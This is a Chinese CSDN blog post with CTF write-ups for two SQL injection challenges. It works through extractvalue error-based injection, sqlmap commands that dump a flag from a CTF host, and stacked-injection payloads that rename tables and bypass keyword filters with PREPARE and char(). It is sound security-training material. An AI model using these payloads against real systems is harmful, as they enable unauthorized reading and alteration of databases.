sql注入(sqlmap)

最新推荐文章于 2024-05-01 23:32:54 发布
最新推荐文章于 2024-05-01 23:32:54 发布
阅读量803 收藏 2
点赞数
文章标签: 大数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/125558729
版权

[SWPUCTF 2021 新生赛]error

通过id的报错可以判断是字符型注入,order by 得出字段数是3

 函数解释:   
extractvalue():从目标XML中返回包含所查询值的字符串。   
EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc   
第二个参数:XPath_string (Xpath格式的字符串)  
extractvalue()能查询字符串的最大长度为32

简单来说,就是利用参数二的特殊字符串,去匹配参数一中的东西。
正常情况下 参数二的特殊字符串就是一段符合xpath语法规则的字符串。当参数二不符合xpath语法规矩,这个函数就会报错,显示出参数二的内容。
报错注入就是利用这个原理来进行的。

?id=1' union select 1,extractvalue(1,concat(0x7e,(select version()),0x7e)),3--+

 看例子,这里的参数一是随便写的1,参数二是concat(0x7e,(select version()),0x7e)
concat函数是用来连接字符串的,就是将它的所有参数连接起来。
0x7e代表的是~,我们前面讲的要让参数二的字符串不符合xpath规则,然后报错。
由于 ~开头不符合xpath规则,所以这里使用concat来连接 ~ 和中间括号中的sql语句的执行结果。
所以通过concat连接后的字符串肯定不符合xpath规则,所以extractvalue函数肯定报错,从而使我们可以得到中间sql语句的执行结果
 

所以这道题试一下有无报错注入,

 用sqlmap跑。

 sqlmap -u “http://1.14.71.254:28188/index.php?id=1” --dbs
sqlmap -u “http://1.14.71.254:28188/index.php?id=1” -D test_db --tables
sqlmap -u “http://1.14.71.254:28188/index.php?id=1” -D test_db -T test_tb --columns
sqlmap -u “http://1.14.71.254:28188/index.php?id=1” -D test_db -T test_tb -C flag --dump
Sqlmap常用命令总结及注入实战(Access、mysql)_OKAY_TC的博客-CSDN博客_sqlmap命令

 [强网杯 2019]随便注

打开界面,发现是一个字符型注入
输入select发现被过滤有些东西

 然后开始堆叠注入,

’;show tables;#

1';show columns from words;
1';show columns from `1919810931114514`;#    (数字字符串为表名操作时要加反引号)

 

在 1919810931114514表中发现flag,

根据两个表的情况结合实际查询出结果的情况判断出words是默认查询的表,因为words表结构是id和data,传入的inject参数也就是赋值给了id,所以查询id=1的情况,所以默认表是words

思路:修改两个表的名字,同时修改flag字断为id字段

这道题没有禁用rename和alert,所以我们可以采用修改表结构的方法来得到flag 将words表名改为words1,再将数字名表改为words,这样数字名表就是默认查询的表了,但是它少了一个id列,可以将flag字段改为id,或者添加id字段

1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#

这段代码的意思是将words表名改为words1,1919810931114514表名改为words,将现在的words表中的flag列名改为id 然后用1' or 1=1 #得到flag。

 (二)姿势二—预处理语句

SET @tn = 'hahaha';  //存储表名
SET @sql = concat('select * from ', @tn);  //存储SQL语句
PREPARE name from @sql;   //预定义SQL语句
EXECUTE name;  //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE sqla;  //删除预定义SQL语句

本题即可利用 char() 函数将select的ASCII码转换为select字符串,接着利用concat()函数进行拼接得到select查询语句,从而绕过过滤。或者直接用concat()函数拼接select来绕过。

char(115,101,108,101,99,116)等价于select'
因此根据题目意思我们可以构建payload

1';SET @sqli=concat(char(115,101,108,101,99,116),'* from `1919810931114514`');PREPARE st from @sqli;EXECUTE st;#

或者 

1';PREPARE st from concat('s','elect', ' * from `1919810931114514` ');EXECUTE st;#

 

偶尔躲躲乌云334
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SqlMap-Sql注入
08-02
Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。 完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。 在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而直接连接数据库。 支持枚举用户、密码、哈希、权限、角色、数据库、数据表和列。 支持自动识别密码哈希格式并通过字典破解密码哈希。 支持完全地下载某个数据库中的某个表,也可以只下载某个表中的某几列,甚至只下载某一列中的部分数据,这完全取决于用户的选择。 支持在数据库管理系统中搜索指定的数据库名、表名或列名 当数据库管理系统是MySQL、PostgreSQL或Microsoft SQL Server时支持下载或上传文件。 当数据库管理系统是MySQL、PostgreSQL或Microsoft SQL Server时支持执行任意命令并回现标准输出。
sql注入工具sqlmap
06-16
sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash爆破,是ctf sql注入题的必备帮手
SQL注入攻击
Jing-2014
09-02 307
SQL注入攻击:[url]http://baike.baidu.com/view/983303.htm?fr=aladdin[/url] SQL注入攻击是黑客对数据库进行攻击的常用手段之一。 注入简介: SQL注入(SQL Injection)是从正常的WWW端口访问,通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,而...
SQL注入工具之SQLmap入门操作
caixiangting的博客
02-19 1130
level=LEVEL //水平1-5,也不是数字越高越精准,但也不是越高越好。越高数据包发送量就越大,被发现的可能也就越大。如果怕把甲方业务搞挂了,也不要开的太大。--risk=RISK //风险1-3,也不是数字越高越精准,但也不是越高越好。越高数据包发送量就越大,被发现的可能也就越大。虽然没有官方的图形化界面,但是市面上有很多个人做的图形化插件,如果实在不熟悉命令行可以考虑换成图形化插件进行使用。:可以从官方网站(https://sqlmap.org/)下载最新版本的SQLmap
SQLMAP注入教程-11种常见SQLMAP使用方法详解
dfdhxb995397的博客
08-24 3956
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法:一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 ...
sqlmapsql注入(一)
m0_55313512的博客
02-27 5531
SQL注入(一)
sqlmap注入常用命令
智三岁的博客
02-22 1104
最近在学习SQL注入的东西。自己搭建了一个wavsep靶机,作为练习的对象,之后有空会写一个wavsep的教程。 首先下载安装sqlmap..github传送门:https://github.com/sqlmapproject/sqlmap/releases 一、sqlmap选项 目标:至少要选中一个参数 -u URL, --url=URL 目标为 URL (例如. "http://www.site.com/vuln.php?id=1") -g GOOGLEDORK ...
sqlmap注入教程 常用指令
qq_58000413的博客
06-29 1760
sqlmap一些指令
SQLMap使用|命令大全(干货)
热门推荐
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
SQL注入sqlmap入门教程
m0_56634355的博客
04-09 8928
sqlmapsql注入必备的也是最常用的工具,是每一位白帽子在的利器之一。
SQL注入工具介绍——sqlmap
p36273的博客
08-01 1706
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。4、联合查询注入,可以使用union的情况下的注入。5、堆叠查询注入,可以同时执行多条语句的执行时的注入
sqlmap命令详解
Pitbull2014的博客
12-20 1020
cookie注入sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
sqlmap sql注入
08-22
sqlmap sql注入
SQLmap-SQL注入
03-12
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问...
sqlmap sql 注入测试工具
03-06
sqlmap 可以很方便的测试sql 注入 安装后直接使用
10分钟了解数据质量管理-奥斯汀格里芬 Apache Griffin
搞数据
04-28 956
Griffin是一个开源的大数据数据质量解决方案,由eBay开源,它支持批处理和流模式两种数据质量检测方式,是一个基于Hadoop和Spark建立的数据质量服务平台 (DQSP)。它提供了一个全面的框架来处理不同的任务,例如定义数据质量模型、执行数据质量测量、自动化数据分析和验证,以及跨多个数据系统的统一数据质量可视化。Griffin于2016年12月进入Apache孵化器,Apache软件基金会2018年12月12日正式宣布Apache Griffin毕业成为Apache顶级项目。
搭建Kafka源码环境并测试
最新发布
蒋大钊的博客
05-01 876
搭建 Kafka 源码学习环境,本地编译部署测试
云计算知识点-02
lv785的博客
04-27 1330
DataNode是HDFS文件系统的工作节点,DataNode会按照客户端或者是NameNode的调度来存储和检索数据,并定期向NameNode发送它所存储的数据块列表,DataNode是文件系统中真正存储数据的地方。通过这种虚拟化可以减少服务器的数量,提高服务器的使用效率,可以在一定程度上摆脱物理上的空间限制,实现随时随地随需的自由掌控。Glance(镜像服务组件),其作用是:提供虚拟机镜像的存储,查询和检索功能,为nova进行服务,依赖于存储服务(存储镜像本身)和数据库服务(存储镜像相关的数据)。
哪些情况下左联接的数据量比左表大?
Java/Python/大数据干货分享
04-26 373
本文主要探讨SQL和Pandas左连接数据量比左表大的问题。在某些情况下,执行左连接时,SQL和Pandas输出的结果会比左表数据量大。这是为什么呢?左连接是关系型数据库中最常见的连接之一。它的作用是从左表中取出所有的行,以及与右表匹配的所有行。如果某个行在右表中没有匹配到,则会在输出结果中以NULL的形式呈现1)左表与右表为一对多或多对多2)左表与右表关联键都存在空值NULL1)视情景删除或聚合右表中重复关联键的数据2)过滤表中关联键值为NULL的行。
sql注入sqlmap
11-11
Sqlmap是一款开源的自动化SQL注入工具,可以帮助安全测试人员快速检测和利用SQL注入漏洞。以下是使用Sqlmap进行SQL注入检测的步骤: 1. 确认目标网站存在SQL注入漏洞,可以通过手工注入或者使用Sqlmap进行检测。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值